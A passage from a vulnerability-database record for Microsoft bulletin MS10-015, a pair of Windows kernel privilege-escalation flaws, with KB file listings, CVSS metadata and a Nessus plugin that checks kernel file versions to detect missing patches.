class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">697</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_a53281fb1b9d457485ceac6624262557_31bf3856ad364e35_6.1.7600.20591_none_7e385fb5040d8bd8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_f7beb164ed6ad2f80eb9ddad66ce62d9_31bf3856ad364e35_6.1.7600.16481_none_0f2b2670ed3e4cf4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">725</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_6.1.7600.16481_none_d4e35a9fae1103ff.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,320</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-a..ence-infrastructure_31bf3856ad364e35_6.1.7600.20591_none_d562277ec736bfba.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,320</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7600.16481_none_93903c22b7a2b5ea.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,912</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7600.20591_none_940f0901d0c871a5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,912</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:27</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.1.7600.16481_none_6c02b882157a3fa4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,151</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_microsoft-windows-os-kernel_31bf3856ad364e35_6.1.7600.20591_none_6c8185612e9ffb5f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">16,151</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">08-Dec-2009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">12:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2018-04-17T20:27:01", "type": "mskb", "title": "MS10-015: Vulnerabilities in Windows kernel could allow elevation of privilege", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2018-04-17T20:27:01", "id": "KB977165", "href": "https://support.microsoft.com/en-us/help/977165/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-05-18T14:27:06", "description": "The remote Windows host is running a version of the Windows kernel that is affected by two vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the kernel due to the way it handles certain exceptions. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs, view / change / delete data, or create new accounts with full user rights.\n (CVE-2010-0232)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to a double free condition. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs, view / change / delete data, or create new accounts with full user rights.\n (CVE-2010-0233)", "cvss3": {"score": null, "vector": null}, "published": "2010-02-09T00:00:00", "type": "nessus", "title": "MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-015.NASL", "href": "https://www.tenable.com/plugins/nessus/44425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44425);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0233\", \"CVE-2010-0232\");\n script_bugtraq_id(37864, 38044);\n script_xref(name:\"MSFT\", value:\"MS10-015\");\n script_xref(name:\"MSKB\", value:\"977165\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows kernel is affected by two vulnerabilities allowing a\nlocal attacker to execute code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of the Windows kernel\nthat is affected by two vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n kernel due to the way it handles certain exceptions. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs, view / change / delete\n data, or create new accounts with full user rights.\n (CVE-2010-0232)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to a double free condition. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs, view / change / delete\n data, or create new accounts with full user rights.\n (CVE-2010-0233)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista, 2008 and 7.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-0233\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows SYSTEM Escalation via KiTrap0D');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-015';\nkbs = make_list(\"977165\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2,3', win2003:'2', vista:'0,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"977165\";\n\nif (\n # Windows 7 / 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", arch:\"x86\", sp:0, file:\"ntoskrnl.exe\", version:\"6.1.7600.16481\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", arch:\"x86\", sp:0, file:\"ntoskrnl.exe\", version:\"6.1.7600.20591\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2k8\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ntoskrnl.exe\", version:\"6.0.6000.16973\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"ntoskrnl.exe\", version:\"6.0.6000.21175\", min_version:\"6.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ntoskrnl.exe\", version:\"6.0.6001.18377\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"ntoskrnl.exe\", version:\"6.0.6001.22577\", min_version:\"6.0.6001.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.18160\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntoskrnl.exe\", version:\"6.0.6002.22283\", min_version:\"6.0.6002.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 x86 and x64\n hotfix_is_vulnerable(os:\"5.2\", file:\"ntoskrnl.exe\", version:\"5.2.3790.4637\", min_version:\"5.2.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"ntoskrnl.exe\", version:\"5.1.2600.3654\", min_version:\"5.1.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"ntoskrnl.exe\", version:\"5.1.2600.5913\", min_version:\"5.1.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2000\n hotfix_is_vulnerable(os:\"5.0\", file:\"ntoskrnl.exe\", version:\"5.0.2195.7364\", min_version:\"5.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}